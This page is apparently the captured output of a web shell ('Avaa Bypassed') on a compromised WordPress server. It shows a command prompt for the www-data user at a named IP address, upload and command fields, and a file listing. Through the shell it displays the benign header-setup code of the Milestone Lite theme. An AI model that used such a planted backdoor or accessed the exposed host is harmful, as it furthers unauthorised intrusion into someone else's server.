[ Avaa Bypassed ]




Upload:

Command:

www-data@3.147.28.162: ~ $
<?php
/**
 * @package Milestone Lite
 * Setup the WordPress core custom header feature.
 *
 * @uses milestone_lite_header_style()

 */
function milestone_lite_custom_header_setup() {
	add_theme_support( 'custom-header', apply_filters( 'milestone_lite_custom_header_args', array(		
		'default-text-color'     => 'fff',
		'width'                  => 1400,
		'height'                 => 280,
		'wp-head-callback'       => 'milestone_lite_header_style',		
	) ) );
}
add_action( 'after_setup_theme', 'milestone_lite_custom_header_setup' );

if ( ! function_exists( 'milestone_lite_header_style' ) ) :
/**
 * Styles the header image and text displayed on the blog
 *
 * @see milestone_lite_custom_header_setup().
 */
function milestone_lite_header_style() {
	$header_text_color = get_header_textcolor();
	?>
	<style type="text/css">
	<?php
		//Check if user has defined any header image.
		if ( get_header_image() || get_header_textcolor() ) :
	?>
		.header {
			background: url(<?php echo esc_url( get_header_image() ); ?>) no-repeat;
			background-position: center top;
		}
	<?php endif; ?>	
	</style>
	<?php 
} 
endif; // milestone_lite_header_style 

Filemanager

Name Type Size Permission Actions
about-themes.php File 3.46 KB 0644
custom-header.php File 1.16 KB 0644
customizer.php File 10.21 KB 0644
extras.php File 1.25 KB 0644
jetpack.php File 435 B 0644
template-tags.php File 2.95 KB 0644